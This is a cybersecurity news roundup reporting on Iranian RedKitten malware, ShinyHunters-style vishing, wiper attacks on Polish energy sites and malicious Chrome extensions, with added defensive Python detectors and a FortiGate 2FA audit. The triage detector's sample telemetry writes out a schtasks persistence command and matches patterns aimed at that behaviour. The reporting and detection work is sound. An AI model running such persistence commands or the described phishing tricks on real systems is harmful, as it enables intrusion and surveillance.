2026-02-01 AI Startup News

Iran-Linked RedKitten Cyber Campaign Targets Human Rights NGOs and Activists

A Farsi-speaking threat actor aligned with Iranian state interests is suspected to be behind a new campaign targeting non-governmental organizations and individuals involved in documenting recent human rights abuses. The activity, observed by HarfangLab in January 2026, has been codenamed RedKitten. It is said to coincide with the nationwide unrest in Iran that began towards the end of 2025, protesting soaring inflation, rising food prices, and currency depreciation. The ensuing crackdown has resulted in mass casualties and an internet blackout.

“The malware relies on GitHub and Google Drive for configuration and modular payload retrieval, and uses Telegram for command-and-control,” the French cybersecurity company said. What makes the campaign noteworthy is the threat actor’s likely reliance on large language models (LLMs) to build and orchestrate the necessary tooling. The starting point of the attack is a 7-Zip archive with a Farsi filename that contains macro-laced Microsoft Excel documents. The XLSM spreadsheets claim to include details about protesters who died in Tehran between December 22, 2025, and January 20, 2026.

But embedded within each of them is a malicious VBA macro, which, when enabled, functions as a dropper for a C#-based implant (“AppVStreamingUX_Multi_User.dll”) that is loaded by means of a technique called AppDomainManager injection. The VBA macro, for its part, shows signs of being generated by an LLM, based on the “overall style of the VBA code, the variable names and methods” used, as well as the presence of comments like “PART 5: Report the result and schedule if successful.” The attack is likely an effort to target individuals who are looking for information about missing persons, exploiting their emotional distress to create a false sense of urgency and trigger the infection chain. Analysis of the spreadsheet data, such as mismatched ages and birthdates, suggests it is fabricated. The backdoor, dubbed SloppyMIO, uses GitHub as a dead drop resolver to retrieve Google Drive URLs that host images from which its configuration is steganographically extracted, including the Telegram bot token, the Telegram chat ID, and links to the staging locations of its various modules.

As many as five different modules are supported:

- cm, to execute commands using “cmd.exe”
- do, to collect files on the compromised host and create a ZIP archive for each file that fits within the Telegram API file size limits
- up, to write a file to “%LOCALAPPDATA%\Microsoft\CLR_v4.0_32\NativeImages\,” with the file data encoded within an image fetched via the Telegram API
- pr, to create a scheduled task for persistence that runs an executable every two hours
- ra, to start a process

In addition, the malware uses Telegram as its command-and-control (C2) channel, beaconing to the configured Telegram chat ID, receiving additional instructions and sending the results back to the operator. Three operator commands are supported:

- download, which runs the do module
- cmd, which runs the cm module
- runapp, to launch a process

“The malware can fetch and cache multiple modules from remote storage, run arbitrary commands, collect and exfiltrate files and deploy further malware with persistence via scheduled tasks,” HarfangLab said. “SloppyMIO beacons status messages, polls for commands and sends exfiltrated files over to a specified operator leveraging the Telegram Bot API for command-and-control.”

As for attribution, the links to Iranian actors are based on the presence of Farsi artifacts, the lure themes, and tactical similarities with prior campaigns, including that of Tortoiseshell, which has leveraged malicious Excel documents to deliver IMAPLoader using AppDomainManager injection. The attackers’ choice of GitHub as a dead drop resolver is also not without precedent. In late 2022, Secureworks (now part of Sophos) detailed a campaign undertaken by a sub-cluster of an Iranian nation-state group known as Nemesis Kitten that used GitHub as a conduit to deliver a backdoor referred to as Drokbk.
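The chain above gives a defender three concrete things to look for: a .NET process started by Excel with the CLR's AppDomainManager environment variables set (or an .exe.config that declares a custom AppDomainManager), a write into the "%LOCALAPPDATA%\Microsoft\CLR_v4.0_32\NativeImages\" directory the up module uses, and a two-hourly scheduled task. The following is an added example, not HarfangLab's tooling or SloppyMIO code, that runs those checks over constructed telemetry. The event field names, the host binary path, the AppDomainManager type name and the use of schtasks.exe for the task are assumptions; the report does not state them.

```python
"""Triage telemetry for the AppDomainManager injection and persistence behaviours described above.

Added example, not HarfangLab's tooling or SloppyMIO code. The event records and the .exe.config
are constructed; field names (type, image, parent_image, cmdline, env, target), the host binary
path and the AppDomainManager type name are assumed, not taken from the report or any EDR schema.
"""
import re
import xml.etree.ElementTree as ET

# Environment variables the .NET CLR honours to load a custom AppDomainManager into a managed
# process: assembly name, type name, and the runtime version to pin.
APPDOMAIN_ENV = {"APPDOMAIN_MANAGER_ASM", "APPDOMAIN_MANAGER_TYPE", "COMPLUS_VERSION"}
OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe"}
# Destination directory the report names for the "up" module.
NATIVEIMAGES_RX = re.compile(r"\\microsoft\\clr_v4\.0_32\\nativeimages\\", re.I)
# One way to build the two-hourly task; the report does not say how "pr" creates it (assumption).
SCHTASKS_2H_RX = re.compile(r"schtasks.*?/sc\s+hourly.*?/mo\s+2\b", re.I)


def config_loads_appdomain_manager(config_xml):
    """Return (assembly, type) if an .exe.config declares a custom AppDomainManager, else None."""
    runtime = ET.fromstring(config_xml).find("runtime")
    if runtime is None:
        return None
    asm = runtime.find("appDomainManagerAssembly")
    typ = runtime.find("appDomainManagerType")
    if asm is None or typ is None:
        return None
    return asm.get("value", ""), typ.get("value", "")


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyze_event(event):
    """Names of the indicators one event matches (empty list when none)."""
    hits = []
    if event.get("type") == "process":
        if APPDOMAIN_ENV & {k.upper() for k in event.get("env", {})}:
            hits.append("appdomain-manager-env")
        if _basename(event.get("parent_image", "")) in OFFICE_PARENTS:
            hits.append("office-parent")
        if SCHTASKS_2H_RX.search(event.get("cmdline", "")):
            hits.append("schtasks-every-2h")
    elif event.get("type") == "file_write" and NATIVEIMAGES_RX.search(event.get("target", "")):
        hits.append("nativeimages-staging-write")
    return hits


def triage(events):
    """Events with at least one hit, 'high' (two or more indicators on one event) first."""
    out = []
    for ev in events:
        hits = analyze_event(ev)
        if hits:
            out.append({"image": ev.get("image"), "hits": hits,
                        "severity": "high" if len(hits) > 1 else "low"})
    return sorted(out, key=lambda r: r["severity"] != "high")


# Constructed .exe.config: the assembly name is assumed to match the DLL name from the report,
# the type name is invented.
SAMPLE_EXE_CONFIG = """<configuration>
  <runtime>
    <appDomainManagerAssembly value="AppVStreamingUX_Multi_User" />
    <appDomainManagerType value="Loader.Manager" />
  </runtime>
</configuration>"""

# Constructed telemetry: Excel spawns a .NET host with the AppDomainManager variables set, the
# host stages a file under NativeImages and registers a two-hourly task; the last event is benign.
SAMPLE_EVENTS = [
    {"type": "process", "image": r"C:\Users\u\AppData\Local\Temp\host.exe",
     "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "cmdline": "host.exe",
     "env": {"APPDOMAIN_MANAGER_ASM": "AppVStreamingUX_Multi_User",
             "APPDOMAIN_MANAGER_TYPE": "Loader.Manager"}},
    {"type": "file_write", "image": r"C:\Users\u\AppData\Local\Temp\host.exe",
     "target": r"C:\Users\u\AppData\Local\Microsoft\CLR_v4.0_32\NativeImages\update.exe"},
    {"type": "process", "image": r"C:\Windows\System32\schtasks.exe",
     "parent_image": r"C:\Users\u\AppData\Local\Temp\host.exe", "env": {},
     "cmdline": r'schtasks.exe /Create /SC HOURLY /MO 2 /TN Updater /TR "C:\Users\u\AppData\Local\Microsoft\CLR_v4.0_32\NativeImages\update.exe"'},
    {"type": "process", "image": r"C:\Windows\explorer.exe",
     "parent_image": r"C:\Windows\System32\userinit.exe", "cmdline": "explorer.exe", "env": {}},
]

if __name__ == "__main__":
    print(config_loads_appdomain_manager(SAMPLE_EXE_CONFIG))
    for row in triage(SAMPLE_EVENTS):
        print(row)
```

The environment-variable check is the one worth wiring into an EDR query first: the variables are legitimate CLR knobs, but a managed process started from an Office parent with them set has no benign explanation in a normal fleet. The config check covers the other injection route, an .exe.config placed next to a signed .NET host.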

Complicating matters further is the growing adoption of artificial intelligence (AI) tools by adversaries, making it harder for defenders to distinguish one actor from another. “The threat actor’s reliance on commoditized infrastructure (GitHub, Google Drive, and Telegram) hinders traditional infrastructure-based tracking but paradoxically exposes useful metadata and poses other operational security challenges to the threat actor,” HarfangLab said. The development comes a couple of weeks after U.K.-based Iranian activist and independent cyber espionage investigator Nariman Gharib revealed details of a phishing link (“whatsapp-meeting.duckdns[.]org”) that’s distributed via WhatsApp and captures victims’ credentials by displaying a fake WhatsApp Web login page. “The page polls the attacker’s server every second via /api/p/{victim_id}/,” Gharib explained.

“This lets the attacker serve a live QR code from their own WhatsApp Web session directly to the victim. When the target scans it with their phone, thinking they’re joining a ‘meeting,’ they’re actually authenticating the attacker’s browser session. Attacker gets full access to the victim’s WhatsApp account.” The phishing page is also designed to request browser permissions to access the device camera, microphone, and geolocation, effectively turning it into a surveillance kit that can capture victims’ photos, audio, and current whereabouts. It is currently not known who is behind the campaign, or what the motivation behind it was.

TechCrunch’s Zack Whittaker, who uncovered more specifics about the activity, said it’s also aimed at stealing Gmail credentials by serving a bogus Gmail login page that gathers a victim’s password and two-factor authentication (2FA) code. About 50 individuals have been found to be impacted. This includes ordinary people across the Kurdish community, academics, government officials, business leaders, and other senior figures. The findings also come in the aftermath of a major leak suffered by the Iranian hacking group Charming Kitten that laid bare its inner workings, organizational structure, and the key personnel involved.

The leaks also shed light on a surveillance platform named Kashef (aka Discoverer or Revealer) for tracking Iranian citizens and foreign nationals by aggregating data collected by different departments associated with the Islamic Revolutionary Guard Corps (IRGC). In October 2025, Gharib also made available a database containing 1,051 individuals who enrolled in various training programs offered by Ravin Academy, a cybersecurity school founded by two operatives of Iran’s Ministry of Intelligence and Security (MOIS), Seyed Mojtaba Mostafavi and Farzin Karimi. The entity was sanctioned by the U.S. Department of the Treasury in October 2022 for supporting and enabling MOIS’s operations.

This includes assisting MOIS with information security training, threat hunting, cybersecurity, red teaming, digital forensics, malware analysis, security auditing, penetration testing, network defense, incident response, vulnerability analysis, mobile penetration testing, reverse engineering, and security research. “The model allows MOIS to outsource initial recruitment and vetting while maintaining operational control through the founders’ direct relationship with the intelligence service,” Gharib said. “This dual-purpose structure enables MOIS to develop human capital for cyber operations while maintaining a layer of separation from direct government attribution.”

Mandiant Finds ShinyHunters-Style Vishing Attacks Stealing MFA to Breach SaaS Platforms

Google-owned Mandiant on Friday said it identified an “expansion in threat activity” that uses tradecraft consistent with extortion-themed attacks orchestrated by a financially motivated hacking group known as ShinyHunters. The attacks leverage advanced voice phishing (aka vishing) and bogus credential harvesting sites mimicking targeted companies to gain unauthorized access to victim environments by collecting single sign-on (SSO) credentials and multi-factor authentication (MFA) codes. The end goal of the attacks is to target cloud-based software-as-a-service (SaaS) applications to siphon sensitive data and internal communications and extort victims. The tech giant’s threat intelligence team said it’s tracking the activity under multiple clusters, including UNC6661, UNC6671, and UNC6240 (aka ShinyHunters), so as to account for the possibility that these groups could be evolving their modus operandi or mimicking previously observed tactics.

“While this methodology of targeting identity providers and SaaS platforms is consistent with our prior observations of threat activity preceding ShinyHunters-branded extortion, the breadth of targeted cloud platforms continues to expand as these threat actors seek more sensitive data for extortion,” Mandiant noted. “Further, they appear to be escalating their extortion tactics with recent incidents, including harassment of victim personnel, among other tactics.” Details of the vishing and credential theft activity are as follows:

- UNC6661 has been observed pretending to be IT staff in calls to employees at targeted organizations, directing them to credential harvesting links under the guise of instructing them to update their multi-factor authentication (MFA) settings. The activity was recorded between early and mid-January 2026. The stolen credentials are then used to register an attacker-controlled device for MFA and move laterally across the network to exfiltrate data from SaaS platforms. In at least one case, the threat actor weaponized their access to compromised email accounts to send more phishing emails to contacts at cryptocurrency-focused companies; the emails were subsequently deleted to cover their tracks. This is followed by extortion activity conducted by UNC6240.
- UNC6671 has also been identified as impersonating IT staff to deceive victims as part of efforts to obtain their credentials and MFA authentication codes on victim-branded credential harvesting sites since early January 2026. In at least some instances, the threat actors gained access to Okta customer accounts. UNC6671 has also leveraged PowerShell to download sensitive data from SharePoint and OneDrive.

The differences between UNC6661 and UNC6671 relate to the use of different domain registrars for registering the credential harvesting domains (NICENIC for UNC6661 and Tucows for UNC6671), as well as the fact that an extortion email sent following UNC6671 activity did not overlap with known UNC6240 indicators. This indicates that different sets of people may be involved, illustrating the amorphous nature of these cybercrime groups.

What’s more, the targeting of cryptocurrency firms suggests that the threat actors may also be looking to explore further avenues for financial gain. To counter the threat posed to SaaS platforms, Google has outlined a long list of hardening, logging, and detection recommendations:

- Improve help desk processes, including requiring a live video call to verify the identity of the person making a request
- Limit access to trusted egress points and physical locations; enforce strong passwords; and remove SMS, phone call, and email as authentication methods
- Restrict management-plane access, audit for exposed secrets and enforce device access controls
- Implement logging to increase visibility into identity actions, authorizations, and SaaS export behaviors
- Detect MFA device enrollment and MFA life cycle changes; look for OAuth/app authorization events that suggest mailbox manipulation activity using utilities like ToogleBox Email Recall, or identity events occurring outside normal business hours

“This activity is not the result of a security vulnerability in vendors’ products or infrastructure,” Google said. “Instead, it continues to highlight the effectiveness of social engineering and underscores the importance of organizations moving towards phishing-resistant MFA where possible. Methods such as FIDO2 security keys or passkeys are resistant to social engineering in ways that push-based, or SMS authentication are not.”
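The last recommendation is the one that catches the UNC6661 pattern in progress: the victim hands over a password and MFA code on the call, the attacker signs in, and within minutes enrolls a device of their own. The following is an added example, not Google's or Mandiant's detection content, that correlates a successful MFA factor change with a fresh session start for the same user and raises a finding only when a second signal is present (different source IP, untrusted egress, or outside business hours). The records are constructed in the shape of Okta System Log entries with the fields flattened; the eventType names are Okta's as I know them, and the trusted egress range and business hours are assumptions to replace with your own.

```python
"""Flag MFA factor changes that follow a fresh sign-in and carry another risk signal.

Added example, not Google's or Mandiant's detection content. The log records are constructed in the
shape of Okta System Log entries; the eventType names (user.session.start, user.mfa.factor.activate,
user.mfa.factor.deactivate) are Okta's as I know them, the field layout is flattened for readability,
and the trusted egress range and business hours are assumptions to replace with your own.
"""
import ipaddress
from datetime import datetime, timedelta, timezone

TRUSTED_EGRESS = [ipaddress.ip_network("203.0.113.0/24")]   # assumed corporate egress (TEST-NET-3)
BUSINESS_HOURS_UTC = (8, 18)                                 # assumed; normalise to the org's zone
LIFECYCLE_EVENTS = {"user.mfa.factor.activate", "user.mfa.factor.deactivate"}
FRESH_SESSION_WINDOW = timedelta(minutes=30)


def parse_ts(value):
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def trusted(ip):
    return any(ipaddress.ip_address(ip) in net for net in TRUSTED_EGRESS)


def off_hours(ts):
    start, end = BUSINESS_HOURS_UTC
    return ts.weekday() >= 5 or not (start <= ts.hour < end)


def find_suspicious_mfa_changes(log):
    """One finding per successful MFA lifecycle event that (a) follows a session start for the same
    actor within FRESH_SESSION_WINDOW and (b) has at least one more signal: the session came from a
    different IP, the change came from an untrusted egress, or it happened outside business hours."""
    events = sorted(log, key=lambda e: parse_ts(e["published"]))
    findings = []
    for i, ev in enumerate(events):
        if ev["eventType"] not in LIFECYCLE_EVENTS or ev.get("outcome") != "SUCCESS":
            continue
        ts, reasons = parse_ts(ev["published"]), []
        # walk back to the most recent session start for this actor
        for prior in reversed(events[:i]):
            if prior["actor"] != ev["actor"] or prior["eventType"] != "user.session.start":
                continue
            if ts - parse_ts(prior["published"]) <= FRESH_SESSION_WINDOW:
                reasons.append("fresh-session")
                if prior["client_ip"] != ev["client_ip"]:
                    reasons.append("session-ip-mismatch")
            break
        if not reasons:
            continue
        if not trusted(ev["client_ip"]):
            reasons.append("untrusted-egress")
        if off_hours(ts):
            reasons.append("off-hours")
        if len(reasons) > 1:
            findings.append({"actor": ev["actor"], "event": ev["eventType"],
                             "at": ev["published"], "reasons": reasons})
    return findings


# Constructed records: alice enrols a factor two minutes after a night-time sign-in from outside
# the corporate egress; bob does the same from the office at 10:00; carol removes a factor with
# no fresh session at all. 2026-01-12 is a Monday.
SAMPLE_LOG = [
    {"published": "2026-01-12T03:14:00Z", "eventType": "user.session.start",
     "actor": "alice", "client_ip": "198.51.100.23", "outcome": "SUCCESS"},
    {"published": "2026-01-12T03:16:30Z", "eventType": "user.mfa.factor.activate",
     "actor": "alice", "client_ip": "198.51.100.23", "outcome": "SUCCESS"},
    {"published": "2026-01-12T10:00:00Z", "eventType": "user.session.start",
     "actor": "bob", "client_ip": "203.0.113.5", "outcome": "SUCCESS"},
    {"published": "2026-01-12T10:05:00Z", "eventType": "user.mfa.factor.activate",
     "actor": "bob", "client_ip": "203.0.113.5", "outcome": "SUCCESS"},
    {"published": "2026-01-12T14:00:00Z", "eventType": "user.mfa.factor.deactivate",
     "actor": "carol", "client_ip": "203.0.113.9", "outcome": "SUCCESS"},
]

if __name__ == "__main__":
    for finding in find_suspicious_mfa_changes(SAMPLE_LOG):
        print(finding)
```

Requiring two signals keeps the rule quiet for ordinary onboarding (bob) while still firing on the vishing sequence (alice). If the identity provider exposes device or user-agent fields, a new device identifier on the factor event is a stronger second signal than either of the two used here.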


CERT Polska Details Coordinated Cyber Attacks on 30+ Wind and Solar Farms

CERT Polska, the Polish computer emergency response team, revealed that coordinated cyber attacks targeted more than 30 wind and photovoltaic farms, a private company from the manufacturing sector, and a large combined heat and power plant (CHP) supplying heat to almost half a million customers in the country. The incident took place on December 29, 2025. The agency has attributed the attacks to a threat cluster dubbed Static Tundra, which is also tracked as Berserk Bear, Blue Kraken, Crouching Yeti, Dragonfly, Energetic Bear, Ghost Blizzard (formerly Bromine), and Havex. Static Tundra is assessed to be linked to Russia’s Federal Security Service’s (FSB) Center 16 unit.

It’s worth noting that recent reports from ESET and Dragos attributed the activity with moderate confidence to a different Russian state-sponsored hacking group known as Sandworm. “All attacks had a purely destructive objective,” CERT Polska said in a report published Friday. “Although attacks on renewable energy farms disrupted communication between these facilities and the distribution system operator, they did not affect the ongoing production of electricity. Similarly, the attack on the combined heat and power plant did not achieve the attacker’s intended effect of disrupting heat supply to end users.” The attackers are said to have gained access to the internal network of power substations associated with a renewable energy facility to carry out reconnaissance and disruptive activities, including damaging the firmware of controllers, deleting system files, or launching custom-built wiper malware codenamed DynoWiper by ESET.

In the intrusion aimed at the CHP, the adversary engaged in long-term data theft dating all the way back to March 2025 that enabled them to escalate privileges and move laterally across the network. The attackers’ attempts to detonate the wiper malware were unsuccessful, CERT Polska noted. On the other hand, the targeting of the manufacturing sector company is believed to be opportunistic, with the threat actor gaining initial access via a vulnerable Fortinet perimeter device. The attack targeting the grid connection point is also likely to have involved the exploitation of a vulnerable FortiGate appliance.

At least four different versions of DynoWiper have been discovered to date. These variants were deployed on Mikronika HMI computers used by the energy facility and on a network share within the CHP after the attackers secured access through the SSL-VPN portal service of a FortiGate device. “The attacker gained access to the infrastructure using multiple accounts that were statically defined in the device configuration and did not have two-factor authentication enabled,” CERT Polska said, detailing the actor’s modus operandi targeting the CHP. “The attacker connected using Tor nodes, as well as Polish and foreign IP addresses, which were often associated with compromised infrastructure.” The wiper’s functionality is fairly straightforward:

- Initialization, which involves seeding a Mersenne Twister pseudorandom number generator (PRNG)
- Enumerate files and corrupt them with output from the PRNG
- Delete the files

It is worth mentioning here that the malware has no persistence mechanism, no way to communicate with a command-and-control (C2) server, and no ability to execute shell commands.
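The CHP intrusion started with something a configuration audit catches before an attacker does: local accounts defined statically on the FortiGate, exposed through the SSL-VPN portal, with two-factor authentication disabled. The following is an added example, not CERT Polska's or Fortinet's tooling. It parses a constructed FortiOS-style configuration (account and group names invented), lists the local users reachable through SSL-VPN authentication rules whose two-factor setting is disabled or absent (in FortiOS an omitted "set two-factor" means disabled), and emits the CLI that turns FortiToken on for them. The syntax follows the FortiOS CLI as I know it; confirm it against your firmware version.

```python
"""Audit a FortiGate configuration for SSL-VPN users without two-factor authentication.

Added example, not CERT Polska's or Fortinet's tooling. The configuration below is constructed;
it follows FortiOS CLI syntax as I know it (config user local / user group / vpn ssl settings)
and the account and group names are invented. An omitted "set two-factor" is treated as
"disable", which is the FortiOS default.
"""
import shlex

SAMPLE_CONFIG = """\
config user local
    edit "svc-backup"
        set type password
        set two-factor disable
        set passwd ENC redacted
    next
    edit "jkowalski"
        set type password
        set two-factor fortitoken
        set passwd ENC redacted
    next
    edit "contractor1"
        set type password
        set passwd ENC redacted
    next
end
config user group
    edit "sslvpn-users"
        set member "svc-backup" "jkowalski" "contractor1"
    next
    edit "admins"
        set member "jkowalski"
    next
end
config vpn ssl settings
    config authentication-rule
        edit 1
            set groups "sslvpn-users"
            set portal "full-access"
        next
    end
end
"""


def parse_fortios(text):
    """Nested dicts: 'config X' and 'edit Y' open a level, 'set K V...' stores a value list,
    'next'/'end' close a level. Good enough for the sections this audit reads."""
    root, stack = {}, []
    stack.append(root)
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("config "):
            stack.append(stack[-1].setdefault(line[7:], {}))
        elif line.startswith("edit "):
            stack.append(stack[-1].setdefault(line[5:].strip('"'), {}))
        elif line.startswith("set "):
            key, _, value = line[4:].partition(" ")
            stack[-1][key] = shlex.split(value)
        elif line in ("next", "end") and len(stack) > 1:
            stack.pop()
    return root


def sslvpn_groups(cfg):
    """Groups named in any SSL-VPN authentication rule."""
    rules = cfg.get("vpn ssl settings", {}).get("authentication-rule", {})
    return {g for rule in rules.values() if isinstance(rule, dict) for g in rule.get("groups", [])}


def sslvpn_accounts_without_2fa(cfg):
    """Local accounts that are members of an SSL-VPN group and have two-factor disabled/unset."""
    exposed = set()
    for name, group in cfg.get("user group", {}).items():
        if name in sslvpn_groups(cfg):
            exposed.update(group.get("member", []))
    weak = []
    for user in sorted(exposed):
        entry = cfg.get("user local", {}).get(user)
        if entry is None:
            continue  # remote (LDAP/RADIUS) user or a nested group; out of scope here
        if entry.get("two-factor", ["disable"])[0] == "disable":
            weak.append(user)
    return weak


def remediation_cli(weak):
    """CLI to enable FortiToken 2FA on each flagged account. A token must still be provisioned
    and assigned (set fortitoken) for each user; that step is deliberately not automated here."""
    lines = ["config user local"]
    for user in weak:
        lines += [f'    edit "{user}"', "        set two-factor fortitoken", "    next"]
    lines.append("end")
    return "\n".join(lines)


if __name__ == "__main__":
    cfg = parse_fortios(SAMPLE_CONFIG)
    weak = sslvpn_accounts_without_2fa(cfg)
    print("SSL-VPN accounts without 2FA:", weak)
    print(remediation_cli(weak))
```

The two findings here are the two shapes CERT Polska describes: an account where the administrator explicitly left two-factor off (svc-backup) and one where nobody ever set it (contractor1). Run the same audit against the admin accounts in "config system admin" as well, where the setting has the same default.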

Nor does it attempt to hide its activity from security programs. CERT Polska said the attack targeting the manufacturing sector company involved a PowerShell-based wiper dubbed LazyWiper that overwrites files on the system with pseudorandom 32-byte sequences to render them unrecoverable. It is suspected that the core wiping functionality was developed using a large language model (LLM). “The malware used in the incident involving renewable energy farms was executed directly on the HMI machine,” CERT Polska pointed out.

“In contrast, in the CHP plant (DynoWiper) and the manufacturing sector company (LazyWiper), the malware was distributed within the Active Directory domain via a PowerShell script executed on a domain controller.” The agency also described the code-level similarities between DynoWiper and other wipers built by Sandworm as “general” in nature, saying they do not offer concrete evidence as to whether that threat actor participated in the attack. “The attacker used credentials obtained from the on-premises environment in attempts to gain access to cloud services,” CERT Polska said. “After identifying credentials for which corresponding accounts existed in the M365 service, the attacker downloaded selected data from services such as Exchange, Teams, and SharePoint.” “The attacker was particularly interested in files and email messages related to OT network modernization, SCADA systems, and technical work carried out within the organizations.”

Cybersecurity researchers have discovered malicious Google Chrome extensions that come with capabilities to hijack affiliate links, steal data, and collect OpenAI ChatGPT authentication tokens. One of the extensions in question is Amazon Ads Blocker (ID: pnpchphmplpdimbllknjoiopmfphellj), which claims to be a tool to browse Amazon without any sponsored content. It was uploaded to the Chrome Web Store by a publisher named “10Xprofit” on January 19, 2026. “The extension does block ads as advertised, but its primary function is hidden: it automatically injects the developer’s affiliate tag (10xprofit-20) into every Amazon product link and replaces existing affiliate codes from content creators,” Socket security researcher Kush Pandya said.

Further analysis has determined that Amazon Ads Blocker is part of a larger cluster of 29 browser add-ons that target several e-commerce platforms like AliExpress, Amazon, Best Buy, Shein, Shopify, and Walmart. The complete list is as follows:

- AliExpress Invoice Generator (FREE) - AliInvoice™️ (10+ Templates) (ID: mabbblhhnmlckjbfppkopnccllieeocp)
- AliExpress Price Tracker - Price History & Alerts (ID: loiofaagnefbonjdjklhacdhfkolcfgi)
- AliExpress Quick Currency & Price Converter (ID: mcaglpclodnaiimhicpjemhcinjfnjce)
- AliExpress Deals Countdown - Flash Sale Timer (ID: jmlgkeaofknfmnbpmlmadnfnfajdlehn)
- 10Xprofit - Amazon Seller Tools (FBA & FBM) (ID: ahlnchhkedmjbdocaamkbmhppnligmoh)
- Amazon Ads Blocker (ID: pnpchphmplpdimbllknjoiopmfphellj)
- Amazon ASIN Lookup 10xprofit (ID: ljcgnobemekghgobhlplpehijemdgcgo)
- Amazon Search Suggestion (ID: dnmfcojgjchpjcmjgpgonmhccibjopnb)
- Amazon Product Scraper 10xprofit (ID: mnacfoefejolpobogooghoclppjcgfcm)
- Amazon Quick Brand Search (ID: nigamacoibifjohkmepefofohfedblgg)
- Amazon Stock Checker 999 (ID: johobikccpnmifjjpephegmfpipfbfme)
- Amazon Price History Saver (ID: kppfbknppimnoociaomjcdgkebdmenkh)
- Amazon ASIN Copy (ID: aohfjaadlbiifnnajpobdhokecjokhab)
- Amazon Keyword Cloud Generator (ID: gfdbbmngalhmegpkejhidhgdpmehlmnd)
- Amazon Image Downloader (ID: cpcojeeblggnjjgnpiicndnahfhjdobd)
- Amazon Negative Review Hider (ID: hkkkipfcdagiocekjdhobgmlkhejjfoj)
- Amazon Listing Score Checker (ID: jaojpdijbaolkhkifpgbjnhfbmckoojh)
- Amazon Keyword Density Searcher (ID: ekomkpgkmieaaekmaldmaljljahehkoi)
- Amazon Sticky Notes (ID: hkhmodcdjhcidbcncgmnknjppphcpgmh)
- Amazon Result Numbering (ID: nipfdfkjnidadibpbflijepbllfkokac)
- Amazon Profit Calculator Lite (ID: behckapcoohededfbgjgkgefgkpodeho)
- Amazon Weight Converter (ID: dfnannaibdndmkienngjahldiofjbkmj)
- Amazon BSR Fast View (ID: nhilffccdbcjcnoopblecppbhalagpaf)
- Amazon Character Count & Seller Tools (ID: goikoilmhcgfidolicnbgggdpckdcoam)
- Amazon Global Price Checker (ID: mjcgfimemamogfmekphcfdehfkkbmldn)
- BestBuy Search By Image (ID: nppjmiadmakeigiagilkfffplihgjlec)
- SHEIN Search By Image (ID: mpgaodghdhmeljgogbeagpbhgdbfofgb)
- Shopify Search By Image (ID: gjlbbcimkbncedhofeknicfkhgaocohl)
- Walmart Search By Image (ID: mcaihdkeijgfhnlfcdehniplmaapadgb)

While “Amazon Ads Blocker” offers the advertised functionality, it also embeds malicious code that scans all Amazon product URL patterns for any affiliate tag without requiring any user interaction, and replaces it with “10xprofit-20” (or “_c3pFXV63” for AliExpress). In cases where there are no tags, the attacker’s tag is appended to each URL. Socket also noted that the extension listing page on the Chrome Web Store makes misleading disclosures, claiming that the developers earn a “small commission” every time a user makes use of a coupon code to make a purchase.

Affiliate links are widely used across social media and websites. They refer to URLs containing a specific ID that enables tracking of traffic and sales to a particular marketer. When a user clicks this link to buy the product, the affiliate earns a cut of the sale. Due to the extensions searching for existing tags and replacing them, social media content creators who share Amazon product links with their own affiliate tags lose commissions when users who have installed the add-on click those links.

This amounts to a violation of Chrome Web Store policies, which require extensions using affiliate links to accurately divulge how the program works, require user action before each injection, and never replace existing affiliate codes. “The disclosure describes a coupon/deal extension with user-triggered reveals. The actual product is an ad blocker with automatic link modification,” Pandya explained. “This mismatch between disclosure and implementation creates false consent.” “The extension also violates the Single Purpose policy by combining two unrelated functions (ad blocking and affiliate injection) that should be separate extensions.” The identified extensions have also been found to scrape product data and exfiltrate it to “app.10xprofit[.]io,” with those focusing on AliExpress serving bogus “LIMITED TIME DEAL” countdown timers on product pages to create a false sense of urgency and rush users into making purchases so as to earn commissions on affiliate links.

“Extensions that combine unrelated functionality (ad blocking, price comparison, coupon finding) with affiliate injection should be treated as high-risk, particularly those with disclosures that don’t match the actual code behavior,” Socket said. The disclosure comes as Broadcom-owned Symantec flagged four different extensions that have a combined user base exceeding 100,000 users and are designed to steal data:

- Good Tab (ID: glckmpfajbjppappjlnhhlofhdhlcgaj), which grants full clipboard permissions to an external domain (“api.office123456[.]com”) to enable remote clipboard-read and clipboard-write access
- Children Protection (ID: giecgobdmgdamgffeoankaipjkdjbfep), which implements functionality to harvest cookies, inject ads, and execute arbitrary JavaScript by contacting a remote server
- DPS Websafe (ID: bjoddpbfndnpeohkmpbjfhcppkhgobcg), which changes the default search engine to one under the operators’ control to capture search terms entered by users and potentially route them to malicious websites
- Stock Informer (ID: beifiidafjobphnbhbbgmgnndjolfcho), which is susceptible to a years-old cross-site scripting (XSS) vulnerability in the Stockdio Historical Chart WordPress plugin (CVE-2020-28707, CVSS score: 6.1) that could allow a remote attacker to execute JavaScript code

“While browser extensions can provide a wide range of handy tools to help us achieve more online, much care needs to be taken when choosing to install them, even when installing from trusted sources,” researchers Yuanjing Guo and Tommy Dong said. Rounding off the list of malicious extensions is another network of 16 add-ons (15 on the Chrome Web Store and one on the Microsoft Edge Add-ons marketplace) that are designed to intercept and steal ChatGPT authentication tokens by injecting a content script into chatgpt[.]com. Cumulatively, the extensions were downloaded about 900 times, according to LayerX.

The extensions are assessed to be part of a coordinated campaign due to overlaps in source code, icons, branding, and descriptions:

- ChatGPT folder, voice download, prompt manager, free tools – ChatGPT Mods (ID: lmiigijnefpkjcenfbinhdpafehaddag)
- ChatGPT voice download, TTS download – ChatGPT Mods (ID: obdobankihdfckkbfnoglefmdgmblcld)
- ChatGPT pin chat, bookmark – ChatGPT Mods (ID: kefnabicobeigajdngijnnjmljehknjl)
- ChatGPT message navigator, history scroller – ChatGPT Mods (ID: ifjimhnbnbniiiaihphlclkpfikcdkab)
- ChatGPT model switch, save advanced model uses – ChatGPT Mods (ID: pfgbcfaiglkcoclichlojeaklcfboieh)
- ChatGPT export, Markdown, JSON, images – ChatGPT Mods (ID: hljdedgemmmkdalbnmnpoimdedckdkhm)
- ChatGPT Timestamp Display – ChatGPT Mods (ID: afjenpabhpfodjpncbiiahbknnghabdc)
- ChatGPT bulk delete, Chat manager – ChatGPT Mods (ID: gbcgjnbccjojicobfimcnfjddhpphaod)
- ChatGPT search history, locate specific messages – ChatGPT Mods (ID: ipjgfhcjeckaibnohigmbcaonfcjepmb)
